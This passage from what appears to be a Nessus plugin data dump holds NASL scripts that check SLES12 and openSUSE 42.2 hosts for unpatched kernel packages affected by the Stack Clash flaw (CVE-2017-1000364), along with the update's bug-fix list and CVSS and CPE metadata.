script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.61-52.77.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.12.61-52.77.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-base-debuginfo-3.12.61-52.77.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.61-52.77.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.61-52.77.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.61-52.77.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_77-default-1-4.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_77-xen-1-4.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"s390x\", reference:\"kernel-default-man-3.12.61-52.77.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-3.12.61-52.77.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-base-3.12.61-52.77.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-base-debuginfo-3.12.61-52.77.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-debuginfo-3.12.61-52.77.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-debugsource-3.12.61-52.77.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-devel-3.12.61-52.77.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-syms-3.12.61-52.77.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:13:58", "description": "The openSUSE Leap 42.2 kernel was updated to 4.4.73 to receive security and bugfixes.\n\nThe following security bugs were fixed :\n\n - CVE-2017-1000364: An issue was discovered in the size of the stack guard page on Linux, specifically a 4k stack guard page is not sufficiently large and can be 'jumped' over (the stack guard page is bypassed), this affects Linux Kernel versions 4.11.5 and earlier (the stackguard page was introduced in 2010) (bnc#1039348).\n\n The previous fix caused some Java applications to crash and has been replaced by the upstream fix.\n\nThe following non-security bugs were fixed :\n\n - md: fix a null dereference (bsc#1040351).\n\n - net/mlx5e: Fix timestamping capabilities reporting (bsc#966170, bsc#1015342)\n\n - reiserfs: don't preallocate blocks for extended attributes (bsc#990682)\n\n - ibmvnic: Fix error handling when registering long-term-mapped buffers (bsc#1045568).\n\n - Fix kabi after adding new field to struct mddev (bsc#1040351).\n\n - Fix soft lockup in svc_rdma_send (bsc#729329).\n\n - IB/addr: Fix setting source address in addr6_resolve() (bsc#1044082).\n\n - IB/ipoib: Fix memory leak in create child syscall (bsc#1022595 FATE#322350).\n\n - IB/mlx5: Assign DSCP for R-RoCE QPs Address Path (bsc#966170 bsc#966172 bsc#966191).\n\n - IB/mlx5: Check supported flow table size (bsc#966170 bsc#966172 bsc#966191).\n\n - IB/mlx5: Enlarge autogroup flow table (bsc#966170 bsc#966172 bsc#966191).\n\n - IB/mlx5: Fix kernel to user leak prevention logic (bsc#966170 bsc#966172 bsc#966191).\n\n - NFSv4: do not let hanging mounts block other mounts (bsc#1040364).\n\n - [v2, 2/3] powerpc/fadump: avoid holes in boot memory area when fadump is registered (bsc#1037669).\n\n - [v2,1/3] powerpc/fadump: avoid duplicates in crash memory ranges (bsc#1037669).\n\n - [v2,3/3] powerpc/fadump: provide a helpful error message (bsc#1037669).\n\n - dm: remove dummy dm_table definition (bsc#1045307)\n\n - ibmvnic: Activate disabled RX buffer pools on reset (bsc#1044767).\n\n - ibmvnic: Client-initiated failover (bsc#1043990).\n\n - ibmvnic: Correct return code checking for ibmvnic_init during probe (bsc#1045286).\n\n - ibmvnic: Ensure that TX queues are disabled in\n __ibmvnic_close (bsc#1044767).\n\n - ibmvnic: Exit polling routine correctly during adapter reset (bsc#1044767).\n\n - ibmvnic: Fix incorrectly defined ibmvnic_request_map_rsp structure (bsc#1045568).\n\n - ibmvnic: Remove VNIC_CLOSING check from pending_scrq (bsc#1044767).\n\n - ibmvnic: Remove module author mailing address (bsc#1045467).\n\n - ibmvnic: Remove netdev notify for failover resets (bsc#1044120).\n\n - ibmvnic: Return from ibmvnic_resume if not in VNIC_OPEN state (bsc#1045235).\n\n - ibmvnic: Sanitize entire SCRQ buffer on reset (bsc#1044767).\n\n - ibmvnic: driver initialization for kdump/kexec (bsc#1044772).\n\n - ipv6: release dst on error in ip6_dst_lookup_tail (git-fixes).\n\n - jump label: fix passing kbuild_cflags when checking for asm goto support (git-fixes).\n\n - kabi workaround for net: ipv6: Fix processing of RAs in presence of VRF (bsc#1042286).\n\n - lan78xx: use skb_cow_head() to deal with cloned skbs (bsc#1045154).\n\n - loop: Add PF_LESS_THROTTLE to block/loop device thread (bsc#1027101).\n\n - md: use a separate bio_set for synchronous IO (bsc#1040351).\n\n - mlx4: Fix memory leak after mlx4_en_update_priv() (bsc#966170 bsc#966172 bsc#966191).\n\n - mm: fix new crash in unmapped_area_topdown() (bnc#1039348).\n\n - net/mlx5: Do not unlock fte while still using it (bsc#966170 bsc#966172 bsc#966191).\n\n - net/mlx5: Fix create autogroup prev initializer (bsc#966170 bsc#966172 bsc#966191).\n\n - net/mlx5: Prevent setting multicast macs for VFs (bsc#966170 bsc#966172 bsc#966191).\n\n - net/mlx5: Release FTE lock in error flow (bsc#966170 bsc#966172 bsc#966191).\n\n - net/mlx5e: Modify TIRs hash only when it's needed (bsc#966170 bsc#966172 bsc#966191).\n\n - net: icmp_route_lookup should use rt dev to determine L3 domain (bsc#1042286).\n\n - net: ipv6: Fix processing of RAs in presence of VRF (bsc#1042286).\n\n - net: l3mdev: Add master device lookup by index (bsc#1042286).\n\n - net: make netdev_for_each_lower_dev safe for device removal (bsc#1042286).\n\n - net: vrf: Create FIB tables on link create (bsc#1042286).\n\n - net: vrf: Fix crash when IPv6 is disabled at boot time (bsc#1042286).\n\n - net: vrf: Fix dev refcnt leak due to IPv6 prefix route (bsc#1042286).\n\n - net: vrf: Fix dst reference counting (bsc#1042286).\n\n - net: vrf: Switch dst dev to loopback on device delete (bsc#1042286).\n\n - net: vrf: protect changes to private data with rcu (bsc#1042286).\n\n - powerpc/fadump: add reschedule point while releasing memory (bsc#1040609).\n\n - powerpc/fadump: return error when fadump registration fails (bsc#1040567).\n\n - ravb: Fix use-after-free on `ifconfig eth0 down` (git-fixes).\n\n - sctp: check af before verify address in sctp_addr_id2transport (git-fixes).\n\n - vrf: remove slave queue and private slave struct (bsc#1042286).\n\n - xen-blkback: do not leak stack data via response ring (bsc#1042863 XSA-216).\n\n - xfrm: Only add l3mdev oif to dst lookups (bsc#1042286).", "cvss3": {}, "published": "2017-06-30T00:00:00", "type": "nessus", "title": "openSUSE Security Update : the Linux Kernel (openSUSE-2017-734) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:kernel-debug", "p-cpe:/a:novell:opensuse:kernel-debug-base", "p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-debugsource", "p-cpe:/a:novell:opensuse:kernel-debug-devel", "p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default", "p-cpe:/a:novell:opensuse:kernel-default-base", "p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default-debugsource", "p-cpe:/a:novell:opensuse:kernel-default-devel", "p-cpe:/a:novell:opensuse:kernel-devel", "p-cpe:/a:novell:opensuse:kernel-docs-html", "p-cpe:/a:novell:opensuse:kernel-docs-pdf", "p-cpe:/a:novell:opensuse:kernel-macros", "p-cpe:/a:novell:opensuse:kernel-obs-build", "p-cpe:/a:novell:opensuse:kernel-obs-build-debugsource", "p-cpe:/a:novell:opensuse:kernel-obs-qa", "p-cpe:/a:novell:opensuse:kernel-source", "p-cpe:/a:novell:opensuse:kernel-source-vanilla", "p-cpe:/a:novell:opensuse:kernel-syms", "p-cpe:/a:novell:opensuse:kernel-vanilla", "p-cpe:/a:novell:opensuse:kernel-vanilla-base", "p-cpe:/a:novell:opensuse:kernel-vanilla-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo", "p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource", "p-cpe:/a:novell:opensuse:kernel-vanilla-devel", "cpe:/o:novell:opensuse:42.2"], "id": "OPENSUSE-2017-734.NASL", "href": "https://www.tenable.com/plugins/nessus/101134", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-734.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101134);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2017-1000364\");\n\n script_name(english:\"openSUSE Security Update : the Linux Kernel (openSUSE-2017-734) (Stack Clash)\");\n script_summary(english:\"Check for the openSUSE-2017-734 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The openSUSE Leap 42.2 kernel was updated to 4.4.73 to receive\nsecurity and bugfixes.\n\nThe following security bugs were fixed :\n\n - CVE-2017-1000364: An issue was discovered in the size of\n the stack guard page on Linux, specifically a 4k stack\n guard page is not sufficiently large and can be 'jumped'\n over (the stack guard page is bypassed), this affects\n Linux Kernel versions 4.11.5 and earlier (the stackguard\n page was introduced in 2010) (bnc#1039348).\n\n The previous fix caused some Java applications to crash\n and has been replaced by the upstream fix.\n\nThe following non-security bugs were fixed :\n\n - md: fix a null dereference (bsc#1040351).\n\n - net/mlx5e: Fix timestamping capabilities reporting\n (bsc#966170, bsc#1015342)\n\n - reiserfs: don't preallocate blocks for extended\n attributes (bsc#990682)\n\n - ibmvnic: Fix error handling when registering\n long-term-mapped buffers (bsc#1045568).\n\n - Fix kabi after adding new field to struct mddev\n (bsc#1040351).\n\n - Fix soft lockup in svc_rdma_send (bsc#729329).\n\n - IB/addr: Fix setting source address in addr6_resolve()\n (bsc#1044082).\n\n - IB/ipoib: Fix memory leak in create child syscall\n (bsc#1022595 FATE#322350).\n\n - IB/mlx5: Assign DSCP for R-RoCE QPs Address Path\n (bsc#966170 bsc#966172 bsc#966191).\n\n - IB/mlx5: Check supported flow table size (bsc#966170\n bsc#966172 bsc#966191).\n\n - IB/mlx5: Enlarge autogroup flow table (bsc#966170\n bsc#966172 bsc#966191).\n\n - IB/mlx5: Fix kernel to user leak prevention logic\n (bsc#966170 bsc#966172 bsc#966191).\n\n - NFSv4: do not let hanging mounts block other mounts\n (bsc#1040364).\n\n - [v2, 2/3] powerpc/fadump: avoid holes in boot memory\n area when fadump is registered (bsc#1037669).\n\n - [v2,1/3] powerpc/fadump: avoid duplicates in crash\n memory ranges (bsc#1037669).\n\n - [v2,3/3] powerpc/fadump: provide a helpful error message\n (bsc#1037669).\n\n - dm: remove dummy dm_table definition (bsc#1045307)\n\n - ibmvnic: Activate disabled RX buffer pools on reset\n (bsc#1044767).\n\n - ibmvnic: Client-initiated failover (bsc#1043990).\n\n - ibmvnic: Correct return code checking for ibmvnic_init\n during probe (bsc#1045286).\n\n - ibmvnic: Ensure that TX queues are disabled in\n __ibmvnic_close (bsc#1044767).\n\n - ibmvnic: Exit polling routine correctly during adapter\n reset (bsc#1044767).\n\n - ibmvnic: Fix incorrectly defined ibmvnic_request_map_rsp\n structure (bsc#1045568).\n\n - ibmvnic: Remove VNIC_CLOSING check from pending_scrq\n (bsc#1044767).\n\n - ibmvnic: Remove module author mailing address\n (bsc#1045467).\n\n - ibmvnic: Remove netdev notify for failover resets\n (bsc#1044120).\n\n - ibmvnic: Return from ibmvnic_resume if not in VNIC_OPEN\n state (bsc#1045235).\n\n - ibmvnic: Sanitize entire SCRQ buffer on reset\n (bsc#1044767).\n\n - ibmvnic: driver initialization for kdump/kexec\n (bsc#1044772).\n\n - ipv6: release dst on error in ip6_dst_lookup_tail\n (git-fixes).\n\n - jump label: fix passing kbuild_cflags when checking for\n asm goto support (git-fixes).\n\n - kabi workaround for net: ipv6: Fix processing of RAs in\n presence of VRF (bsc#1042286).\n\n - lan78xx: use skb_cow_head() to deal with cloned skbs\n (bsc#1045154).\n\n - loop: Add PF_LESS_THROTTLE to block/loop device thread\n (bsc#1027101).\n\n - md: use a separate bio_set for synchronous IO\n (bsc#1040351).\n\n - mlx4: Fix memory leak after mlx4_en_update_priv()\n (bsc#966170 bsc#966172 bsc#966191).\n\n - mm: fix new crash in unmapped_area_topdown()\n (bnc#1039348).\n\n - net/mlx5: Do not unlock fte while still using it\n (bsc#966170 bsc#966172 bsc#966191).\n\n - net/mlx5: Fix create autogroup prev initializer\n (bsc#966170 bsc#966172 bsc#966191).\n\n - net/mlx5: Prevent setting multicast macs for VFs\n (bsc#966170 bsc#966172 bsc#966191).\n\n - net/mlx5: Release FTE lock in error flow (bsc#966170\n bsc#966172 bsc#966191).\n\n - net/mlx5e: Modify TIRs hash only when it's needed\n (bsc#966170 bsc#966172 bsc#966191).\n\n - net: icmp_route_lookup should use rt dev to determine L3\n domain (bsc#1042286).\n\n - net: ipv6: Fix processing of RAs in presence of VRF\n (bsc#1042286).\n\n - net: l3mdev: Add master device lookup by index\n (bsc#1042286).\n\n - net: make netdev_for_each_lower_dev safe for device\n removal (bsc#1042286).\n\n - net: vrf: Create FIB tables on link create\n (bsc#1042286).\n\n - net: vrf: Fix crash when IPv6 is disabled at boot time\n (bsc#1042286).\n\n - net: vrf: Fix dev refcnt leak due to IPv6 prefix route\n (bsc#1042286).\n\n - net: vrf: Fix dst reference counting (bsc#1042286).\n\n - net: vrf: Switch dst dev to loopback on device delete\n (bsc#1042286).\n\n - net: vrf: protect changes to private data with rcu\n (bsc#1042286).\n\n - powerpc/fadump: add reschedule point while releasing\n memory (bsc#1040609).\n\n - powerpc/fadump: return error when fadump registration\n fails (bsc#1040567).\n\n - ravb: Fix use-after-free on `ifconfig eth0 down`\n (git-fixes).\n\n - sctp: check af before verify address in\n sctp_addr_id2transport (git-fixes).\n\n - vrf: remove slave queue and private slave struct\n (bsc#1042286).\n\n - xen-blkback: do not leak stack data via response ring\n (bsc#1042863 XSA-216).\n\n - xfrm: Only add l3mdev oif to dst lookups (bsc#1042286).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1015342\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1022595\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1027101\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1037669\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1039214\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1039348\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1040351\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1040364\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1040567\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1040609\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1042286\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1042863\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1043990\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1044082\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1044120\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1044767\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1044772\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1044880\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1045154\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1045235\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1045286\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1045307\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1045467\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1045568\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=966170\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=966172\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=966191\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=990682\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected the Linux Kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-docs-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-docs-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-macros\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-build\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-build-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-qa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/26\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-debug-4.4.73-18.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-debug-base-4.4.73-18.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-debug-base-debuginfo-4.4.73-18.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-debug-debuginfo-4.4.73-18.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-debug-debugsource-4.4.73-18.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-debug-devel-4.4.73-18.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-debug-devel-debuginfo-4.4.73-18.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-default-4.4.73-18.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-default-base-4.4.73-18.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-default-base-debuginfo-4.4.73-18.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-default-debuginfo-4.4.73-18.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-default-debugsource-4.4.73-18.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-default-devel-4.4.73-18.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-devel-4.4.73-18.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-docs-html-4.4.73-18.17.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-docs-pdf-4.4.73-18.17.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-macros-4.4.73-18.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-obs-build-4.4.73-18.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-obs-build-debugsource-4.4.73-18.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-obs-qa-4.4.73-18.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-source-4.4.73-18.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-source-vanilla-4.4.73-18.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-syms-4.4.73-18.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-vanilla-4.4.73-18.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-vanilla-base-4.4.73-18.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-vanilla-base-debuginfo-4.4.73-18.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"kernel-vanilla-debuginfo-4.4.73-18.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", 